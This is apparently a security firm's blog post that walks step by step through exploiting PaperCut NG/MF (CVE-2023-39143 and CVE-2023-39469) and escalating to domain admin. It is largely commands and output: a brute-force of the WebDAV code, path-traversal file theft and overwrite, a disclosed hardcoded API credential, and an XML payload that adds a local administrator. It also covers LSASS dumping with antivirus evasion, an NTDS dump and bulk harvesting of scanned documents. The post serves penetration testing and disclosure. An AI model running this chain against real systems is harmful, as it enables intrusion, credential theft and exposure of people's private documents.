From PaperCut RCE to Domain Admin: Exploiting CVE-2023-39143

Introduction

Following our company motto, we’re sharing today a handy tool for penetration testers and security professionals that we hope will make your job easier. This tool helps demonstrate that vulnerabilities which are hard to verify are still serious and worth fixing.

Background

PaperCut Server is a centralized print management system that monitors, controls, and secures all printing, copying, and scanning activities on a network. It provides user tracking, quota enforcement, and detailed reporting for administrators.

Organizations use PaperCut to control and reduce printing costs and ensure secure, auditable document handling across all networked printers. It also enforces printing policies and quotas to prevent waste and unauthorized access.

Why CVE-2023-39143 remains relevant in 2025?

CVE-2023-39143 affects PaperCut NG and PaperCut MF versions before 22.1.3 on Windows. It is a path traversal vulnerability that allows attackers to access, upload, or delete arbitrary files. When external device integration is enabled, this can lead to remote code execution on the server.

Although CVE-2023-39143 was documented by Horizon3 in 2024, key details were omitted, and exploiting it manually remains cumbersome. Even two years later, unpatched PaperCut servers are still common, highlighting a persistent security risk that organizations continue to overlook.

PaperCut Version Distribution (Publicly Exposed Servers)

Note: This chart is based on publicly exposed PaperCut servers discovered via Shodan and reflects only those indexed there.

Scripts

These are a list of scripts we have developed to help automate the exploitation process described in this article. All scripts referenced here are available on our GitHub repository.

Exploiting the Path Traversal Vulnerability (CVE-2023-39143) in PaperCut Servers

To exploit the path traversal vulnerability via the WebDAV server on a PaperCut server, an attacker first needs a valid password. Fortunately, the password is a six-digit numeric code that can be brute-forced. Once obtained, this allows the attacker to download arbitrary files from the server.

Uploading files via the path traversal vulnerability is more complex. It requires authenticating with the PaperCut XML-RPC API to register a new printer device that supports scanning and initiate a scan job. This process can then be exploited to upload arbitrary files, including overwriting server.properties, which provides access to the administrative console.

Interestingly, several hardcoded API credentials were identified in the Java classes used by PaperCut. This detail was not included in Horizon3’s writeup, but it can simplify the exploitation process significantly.

Identifying Hardcoded API Credentials in PaperCut Source Code

To locate the hardcoded API credentials, we first download the installer and decompile the relevant Java class files for analysis. This step is necessary because these credentials are required to authenticate with the PaperCut XML-RPC API, which is a prerequisite for exploiting the vulnerability and achieving remote code execution (RCE).

# Download the PaperCut NG installer
% wget https://cdn.papercut.com/web/products/ng-mf/installers/ng/22.x/pcng-setup-22.1.5.68858.sh

# Extracts all .jar files from the embedded gzip-compressed tarball inside the PaperCut .sh installer into /tmp/jars by listing the .jar entries and extracting each individually.
% mkdir -p /tmp/jars && \
dd if=pcng-setup-22.1.5.68858.sh bs=4096 skip=1 2>/dev/null \
  | gunzip \
  | tar -tf - | grep '\.jar$' | \
  xargs -I{} sh -c "dd if=pcng-setup-22.1.5.68858.sh bs=4096 skip=1 2>/dev/null | gunzip | tar -xf - -C /tmp/jars '{}'"

# Install the CFR decompiler
% brew install cfr-decompiler

# Prepare a working directory for the JAR contents
% cd /tmp/jars
% unzip papercut-release-22.1.5.68858.jar

# Navigate to the relevant class files
% cd papercut/release/lib/biz/papercut/pcng/release/paystation
% mkdir -p ./decompiled

# Decompile all .class files recursively
find ./ -name '*.class' -type f -print0 | xargs -0 -I{} /usr/local/opt/cfr-decompiler/bin/cfr-decompiler {} --outputdir ./decompiled

# Finding file containing hardcoded API credentials
grep -R --include='*.java' 'VENDOR_ID = ' ./decompiled

After decompiling the Java class files, we searched for vendor identifiers by looking for the string VENDOR_ID. Several hardcoded values were identified across different credit source classes:.

These hardcoded identifiers indicate internal development or integration points and can be leveraged to simplify authentication or API interactions during exploitation. This step reveals information that was missing from previous analyses, such as Horizon3’s writeup, and provides insight into how attackers can target specific components within PaperCut.

Detecting the PaperCut Server Version

The first step is to determine the version of PaperCut software running on the remote server. We use the detect_papercut_version.py script for this purpose.

# python3.11 detect_papercut_version.py -u https://192.168.1.5:9192
192.168.1.5:9192 - PaperCut 22.0

Brute-Forcing the WebDAV Access Code

We developed the papercut_webdav_brute.py script to brute-force the six-digit code required to access the WebDAV server. The script is multithreaded for faster execution and can resume from the last attempt if interrupted (e.g., with CTRL-C)…

# python3 papercut_webdav_brute.py -u https://192.168.1.5:9192
[+] Got password! 555111
590234 403
603186 403
593227 403
[+] Password saved to found_password.txt
594220 403

Running the CVE-2023-39143.py script enables us to upload a modified copy of server.properties, changing the administrative password to admin12345. The script first modifies the previously downloaded server.properties file, then retrieves the server.uuid via the path traversal vulnerability, which is required later in the process.

It authenticates to the XML-RPC interface at /rpc/extdevice/xmlrpc using the hardcoded API credentials uncovered from the source code. If no printer device ID is specified, the script automatically creates a new printer device with integrated scanning enabled.

Finally, it initiates a new scan job, requiring a valid user ID that can be identified from the list of users in the /data/scan/jobs/ folder on the PaperCut server. This script then exploits the path traversal vulnerability to replace the original server.properties with the modified version, thereby setting the new admin password.

flowchart TD
    Z[Check PaperCut version to confirm vulnerability] --> A[Download server.properties from PaperCut server]
    A --> B[Modify admin password to admin12345]
    B --> C[Fetch server.uuid via path traversal]
    C --> D[Authenticate to /rpc/extdevice/xmlrpc using hardcoded API credentials]
    D --> E{Printer device ID specified?}
    E -- No --> F[Create new printer device with integrated scanning enabled]
    E -- Yes --> G[Use existing printer device]
    F --> H[Extract user IDs from /data/scan/jobs/ folder]
    G --> H[Extract user IDs from /data/scan/jobs/ folder]
    H --> I[Iterate through extracted user IDs until one works]
    I --> J[Create new scan job with working user ID]
    J --> K[Exploit path traversal to upload modified server.properties]
    K --> L[Admin password successfully set to admin12345]

First, we use papercut_download.py to download a copy of the server.properties file from the PaperCut server, which contains the password hash for the administrative account.

# python3 papercut_download.py -u https://192.168.1.5:9192 -U papercut-webdav -P 555111 -p server.properties
[+] Processing path: server.properties
[+] Sending COPY request to:
https://192.168.1.5:9192/webdav/..\..\..\server.properties
[+] Destination filename: zh87ryn4g3o0768r.png
[+] COPY request successful: 201
[+] Downloading copied file from:
https://192.168.1.5:9192:9192/custom-report-example/..\..\..\data\scan\webdav\zh87ryn4g3o0768r.png
[+] Saved copied file to: ./server.properties

While the password hash could be cracked, a simpler approach is to directly modify the file to set the password to a value of our choosing.

# python3.11 CVE-2023-39143.py --url https://192.168.1.5:9192 --password 555111 -f server.properties -m upload --replace-password 
[!] --scan-job-id not provided: a new scan job will be created (not replacing existing files)
Selected mode: upload
[i] Backup created: server.properties.backup
[i] Backup created: server.properties.modified
[i] Replaced admin password in server.properties.modified
[+] Processing path: server.uuid
[+] Sending COPY request to: https://192.168.1.5:9192/webdav/..\..\..\server.uuid
[+] Destination filename: ugfltuyqqjjcmpie.png
[+] COPY request successful: 201
[+] Downloading copied file from: https://192.168.1.5:9192/custom-report-example/..\..\..\data\scan\webdav\ugfltuyqqjjcmpie.png
[+] server-uuid: 7db4fede-e2e9-4787-8e2b-45c720435609
[i] Testing credentials against server: https://192.168.1.5:9192/rpc/extdevice/xmlrpc
[+] papercut-dev:155d750995d18f6d4e870e25cb409f67 → VALID - session_token: QiHQw
[i] No device ID provided. Creating a test device...
[+] Registered device with ID: 53053
[+] getAllDeviceConfig response: [['ext-device.auth.auto-login-username', ''], ['ext-device.auth.mask-id-number', 'N'], ['ext-device.integrated-scanning.enabled', 'Y'], ['ext-device.language-selection.option', 'DEVICE_DEFAULT_LANGUAGE'], ['system.account-confirmation', 'Y'], ['system.allow-release-all', 'Y'], ['system.allowed-auth-modes', 'USERNAME_PASSWORD'], ['system.auth-card-login-requires-pin', 'N'], ['system.auth-id-login-requires-pin', 'N'], ['system.auth-login-requires-pin', 'N'], ['system.auth-mask-id-number', 'N'], ['system.change-print-job-settings.duplex.enabled', 'N'], ['system.change-print-job-settings.grayscale.enabled', 'N'], ['system.config-last-updated', 'mflf8slu'], ['system.device-function', 'COPIER'], ['system.disabled-by-admin', 'Y'], ['system.home-screen.mandatory', 'N'], ['system.home-screen.show-balance', 'N'], ['system.inactivity-timeout-secs', '60'], ['system.integrated-scanning.enabled', 'Y'], ['system.is-release-any', 'N'], ['system.language-selection.enabled', 'N'], ['system.offline-delay-seconds', '120'], ['system.offline-mode-enabled', 'N'], ['system.offline-unlock-required', 'N'], ['system.print-as-duplex-by-default', 'N'], ['system.print-as-grayscale-by-default', 'N'], ['system.release-all-on-login', 'N'], ['system.show-print-job-account', 'Y'], ['system.show-print-job-account-balance', 'Y'], ['system.swipe-logout-enabled', 'N']]
[+] Trying to scan as user: admin
[+] Extracted scanJobId: c3599920-2a88-4c93-bdcc-9d76d3fd85fb
papercut-webdav 555111 https://192.168.1.5:9192/webdav c3599920-2a88-4c93-bdcc-9d76d3fd85fb ..\..\..\..\server.properties server.properties.modified
[i] Uploading 'server.properties.modified' to 'https://192.168.1.5:9192/webdav/c3599920-2a88-4c93-bdcc-9d76d3fd85fb/..\..\..\..\server.properties' as 'papercut-webdav'
[+] Upload response code: 201
[+] Upload successful.

CVE-2023-39469: RCE via PaperCut NG External User Lookup Injection

To achieve remote code execution, we can exploit CVE-2023-39469 . This vulnerability, known as the PaperCut NG External User Lookup Code Injection RCE, allows authenticated remote attackers to execute arbitrary code on affected PaperCut NG installations. The flaw exists within the External User Lookup functionality, where user-supplied input is not properly validated before being executed as Java code. Exploiting this vulnerability enables an attacker to execute code in the context of SYSTEM.

The prerequisite is having access to the PaperCut administrative console as well as a PostgreSQL server, which can be set up if needed.

# python3 CVE-2023-39469.py -u admin -p admin12345 --pgserver 192.168.1.10 --xmlurl http://192.168.1.10:900/test.xml
[*] Logging in...
[*] Fetching OptionsAdvanced page...
[*] Extracted hidden value: SqTPPZFuBT62VvitTPH5d
[*] Extracted masked text field value: 71d947a2-
4b61-40d2-9cdb-56ea4317cc31
[*] Submitting External User Lookup form: configuring
PostgreSQL database for card number lookup to
exploit the vulnerability
[*] HTTP status code: 200
[*] Performing user list lookup…
[*] User list lookup status: 200

As demonstrated in the previous example, the --xmlurl parameter must specify the location of an XML file hosted on an HTTP server accessible to the PaperCut server. The --pgserver parameter identifies the PostgreSQL server used by the driver. This server may be either local or remote. Administrative credentials for the PaperCut web interface must also be provided; in this example, the credentials are set to admin12345.

Below is a sample XML file that could be used to create a new local account and assign administrative privileges.:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>cmd.exe</value>
                <value>/c</value>
                <value>net user foregenix MyP@ssw0rd /add && net localgroup Administrators foregenix /add</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

Once the PaperCut server successfully connects to read your XML file, the exploitation of CVE-2023-39469 is considered successful.

# medusa -M smbnt -u foregenix -p 'xxxxxx' -h 192.168.1.5
ACCOUNT CHECK: [smbnt] Host: 192.168.1.5 (1 of 1, 0 complete) User: foregenix (1 of 1, 0 complete) Password: xxxxxx (1 of 1 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.1.5 User:foregenix Password: xxxxxx [SUCCESS (ADMIN$ -Access Allowed)]

Privilege Escalation to Domain Admin

Now that we have local administrator access on the PaperCut server, that is not sufficient; we want to determine if we can escalate privileges to gain domain administrator access.

Having local administrator access on the PaperCut server is not sufficient; the next step is to determine if we can escalate privileges to gain domain administrator access.

During our research, we came across a Twitter post by TwoSevenOneT describing how to dump cleartext credentials from lsass.exe using the Windows 8.1 version of WerFaultSecure.exe. Notably, this method was not detected by antivirus software at the time of testing.

Performing this process manually is time-consuming and error-prone across multiple hosts. To simplify it, we developed a custom NetExec module that executes these tasks on all target Windows hosts with a single command.

To focus our efforts on relevant machines, we first determine whether a Domain or Enterprise Admin has previously logged in. This is achieved using our custom NetExec enum_local_sessions module, which enumerates user accounts based on the profiles present in C:\Users.

# nxc smb 192.168.1.5 -u foregenix -p 'xxxxxx' --timeout 120 --local-auth --smb-timeout 60 -M enum_local_sessions
enum_local_sessions... 192.168.1.5 445 APP01 [+] Users found: Administrator, ppcadmin

Next, if a member of these groups is found, we enable the WDIGEST registry key, allowing LSASS to store clear-text credentials in memory, which can be done using our NetExec wdigest module.

# nxc smb 192.168.1.5 -u foregenix -p 'xxxxxx' --timeout 120 --local-auth --smb-timeout 60 -M wdigest -o ACTION=enable
SMB 192.168.1.5 445 APP01 [*] Windows 10/Server 2019 Build 17763 x64
(name:APP01) (domain:APP01) (signing:False) (SMBv1:True)
SMB 192.168.1.5 445 APP01 [+] APP01\foregenix:[...snip...](Pwn3d!)
WDIGEST 192.168.1.5 445  APP01  [+] UseLogonCredential registry key created successfully

The next step is to wait for a member of the Domain/Enterprise Admins to log in, then use our NetExec wsassdump module to dump LSASS via WerFaultSecure.exe, compress the dump, and download the file. The extracted dump can then be processed with Mimikatz or PyPyKatz to retrieve cleartext credentials.

# nxc smb 192.168.1.5 -u foregenix -p 'xxxxxx' --timeout 120 --local-auth --smb-timeout 60 -M wsassdump      
SMB         192.168.1.5    445    XXXX          [*] Windows 10 / Server 2019 Build 17763 x64 (name:XXXX) (domain:XXXX) (signing:False) (SMBv1:True)
SMB         192.168.1.5    445    XXXX          [+] XXXX\foregenix:XXXXX (Pwn3d!)
WSASSDUMP   192.168.1.5    445    XXXX          [*] Ensuring remote folder exists: C:\Temp
WSASSDUMP   192.168.1.5    445    XXXX          [+] Remote folder exists: C:\Temp
WSASSDUMP   192.168.1.5    445    XXXX          [*] Getting LSASS PID via command: powershell -Command "Get-Process lsass | Select-Object -ExpandProperty Id | Out-File -FilePath C:\Temp\lsass_pid.txt -Encoding ascii"
WSASSDUMP   192.168.1.5    445    XXXX          [+] Command executed, PID should be in C:\Temp\lsass_pid.txt
WSASSDUMP   192.168.1.5    445    XXXX          [+] lsass.exe PID: 960
WSASSDUMP   192.168.1.5    445    XXXX          [+] Uploaded WSASS.exe as BAP9Vc7z.exe to C:\Temp
WSASSDUMP   192.168.1.5    445    XXXX          [+] Uploaded WerFaultSecure.exe as OfbfIFTR.exe to C:\Temp
WSASSDUMP   192.168.1.5    445    XXXX          [*] Executing command: cmd.exe /c "cd C:\Temp && BAP9Vc7z.exe OfbfIFTR.exe 960"
WSASSDUMP   192.168.1.5    445    XXXX          [+] Executed binaries BAP9Vc7z.exe OfbfIFTR.exe with PID 960 in C:\Temp
WSASSDUMP   192.168.1.5    445    XXXX          [*] Waiting for file C:\Temp\test.png to be fully written...
WSASSDUMP   192.168.1.5    445    XXXX          [+] File C:\Temp\test.png is fully written, size: 105713774 bytes
WSASSDUMP   192.168.1.5    445    XXXX          [*] Zipping C:\Temp\test.png to C:\Temp\test.zip
WSASSDUMP   192.168.1.5    445    XXXX          [+] Created C:\Temp\test.zip
WSASSDUMP   192.168.1.5    445    XXXX          [*] Downloading C:\Temp\test.png to local file 192.168.1.5_lsass.png
WSASSDUMP   192.168.1.5    445    XXXX          [+] Downloaded file to 192.168.1.5_lsass.png
WSASSDUMP   192.168.1.5    445    XXXX          [+] Patched dump saved to 192.168.1.5_lsass.dmp
WSASSDUMP   192.168.1.5    445    XXXX          [+] Deleted remote file: C:\Temp\test.png
WSASSDUMP   192.168.1.5    445    XXXX          [+] Deleted remote file: C:\Temp\test.zip---
WSASSDUMP   192.168.1.5    445    XXXX          [+] Deleted remote file: C:\Temp\BAP9Vc7z.exe
WSASSDUMP   192.168.1.5    445    XXXX          [+] Deleted remote file: C:\Temp\OfbfIFTR.exe

# pypykatz lsa minidump 192.168.1.5_lsass.dmp
INFO:pypykatz:Parsing file 192.168.1.5_lsass.dmp
FILE: ======== 192.168.1.5_lsass.dmp =======
[...snip...]

With cleartext credentials for a Domain/Enterprise Admin user, we can dump DPAPI secrets via NetExec from the domain controller.

# nxc smb 192.168.1.55 -u admin_user1 -p 'XXXXXX' --ntds drsuapi --timeout 120 --smb-timeout 120
SMB         192.168.1.34    445    CORPDC1        [*] Windows Server 2022 Build 20348 x64 (name:CORPDC1) (domain:domain.local) (signing:False) (SMBv1:False)
SMB         192.168.1.34    445    CORPDC1        [+] domain.local\admin_user1:XXXX (Pwn3d!)
SMB         192.168.1.34    445    CORPDC1        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.1.34    445    CORPDC1        domain.local\domain_admin:500:aad3b435b51404eeaad3b435b51404ee:[...snip...]:::
SMB         192.168.1.34    445    CORPDC1        

Harvesting User-Scanned Files from PaperCut Servers

To further demonstrate the risk, we developed papercut_scan_docs_crawler.py, a script that crawls and downloads scanned documents stored on the PaperCut server. By default, PaperCut retains scan jobs for up to 30 days, with a minimum retention of 1 day, meaning sensitive documents remain accessible on the server for an extended period. These documents may contain personally identifiable information (PII) or other sensitive data, representing a significant security and privacy concern.

# python3.11 papercut_scan_docs_crawler.py -u https://192.168.1.5:9192  --user papercut-webdav --password 555111 -t 20
 - /data/scan/jobs/
 - /data/scan/jobs/tom/
 - /data/scan/jobs/john/
 - /data/scan/jobs/peter/
 - /data/scan/jobs/jack/
[...snip...]
[*] Crawling completed in 181.51 seconds
[i] File already exists, skipping: loot/data/scan/jobs/john/23027/b08d8921-fb01-4466-9e37-c9e4655c5b46/scannedImage_1.pdf
[+] Sending COPY request to: https://192.168.1.5:9192/webdav/..\..\..\/data/scan/jobs/jack/23025/999d7b12-99ef-4533-a88d-1df89eadf0fa/scannedImage_1.pdf
[+] Destination filename: temp.png
[+] COPY request successful: 204
[+] Downloading copied file from: https://192.168.1.5:9192/custom-report-example/..\..\..\data\scan\webdav/temp.png

Restoring the Original server.properties File

We can now restore the original server.properties file to the PaperCut server, as we already have administrative access.

# python3.11 CVE-2023-39143.py --url https://192.168.1.5:9192 --password 555111 -f server.properties -m upload 
[!] --scan-job-id not provided: a new scan job will be created (not replacing existing files)
Selected mode: upload
[i] --replace-password not specified, skipping server.properties modification
[+] Processing path: server.uuid
[+] Sending COPY request to: https://192.168.1.5:9192/webdav/..\..\..\server.uuid
[+] Destination filename: a1c4q4u6m62x7yo9.png
[+] COPY request successful: 201
[+] Downloading copied file from: https://192.168.1.5:9192/custom-report-example/..\..\..\data\scan\webdav\a1c4q4u6m62x7yo9.png
[+] server-uuid: 7db4fede-e2e9-4787-8e2b-45c720435609
[i] Testing credentials against server: https://192.168.1.5:9192/rpc/extdevice/xmlrpc
[+] papercut-dev:155d750995d18f6d4e870e25cb409f67 → VALID - session_token: mSTlT
[i] No device ID provided. Creating a test device...
[+] Registered device with ID: 53053
[+] getAllDeviceConfig response: [['ext-device.auth.auto-login-username', ''], ['ext-device.auth.mask-id-number', 'N'], ['ext-device.integrated-scanning.enabled', 'Y'], ['ext-device.language-selection.option', 'DEVICE_DEFAULT_LANGUAGE'], ['system.account-confirmation', 'Y'], ['system.allow-release-all', 'Y'], ['system.allowed-auth-modes', 'USERNAME_PASSWORD'], ['system.auth-card-login-requires-pin', 'N'], ['system.auth-id-login-requires-pin', 'N'], ['system.auth-login-requires-pin', 'N'], ['system.auth-mask-id-number', 'N'], ['system.change-print-job-settings.duplex.enabled', 'N'], ['system.change-print-job-settings.grayscale.enabled', 'N'], ['system.config-last-updated', 'mflf8slu'], ['system.device-function', 'COPIER'], ['system.disabled-by-admin', 'Y'], ['system.home-screen.mandatory', 'N'], ['system.home-screen.show-balance', 'N'], ['system.inactivity-timeout-secs', '60'], ['system.integrated-scanning.enabled', 'Y'], ['system.is-release-any', 'N'], ['system.language-selection.enabled', 'N'], ['system.offline-delay-seconds', '120'], ['system.offline-mode-enabled', 'N'], ['system.offline-unlock-required', 'N'], ['system.print-as-duplex-by-default', 'N'], ['system.print-as-grayscale-by-default', 'N'], ['system.release-all-on-login', 'N'], ['system.show-print-job-account', 'Y'], ['system.show-print-job-account-balance', 'Y'], ['system.swipe-logout-enabled', 'N']]
[+] Trying to scan as user: test_user1
[+] Extracted scanJobId: f2a93d47-f514-4d0a-8913-626378bad2c7
papercut-webdav 555111 https://192.168.1.5:9192/webdav f2a93d47-f514-4d0a-8913-626378bad2c7 ..\..\..\..\server.properties server.properties
[i] Uploading 'server.properties' to 'https://192.168.1.5:9192/webdav/f2a93d47-f514-4d0a-8913-626378bad2c7/..\..\..\..\server.properties' as 'papercut-webdav'
[+] Upload response code: 201
[+] Upload successful.

Resources

Head over to the Foregenix GitHub repository where you can download the python scripts highlighted in this post: https://github.com/foregenix/CVE-2023-39143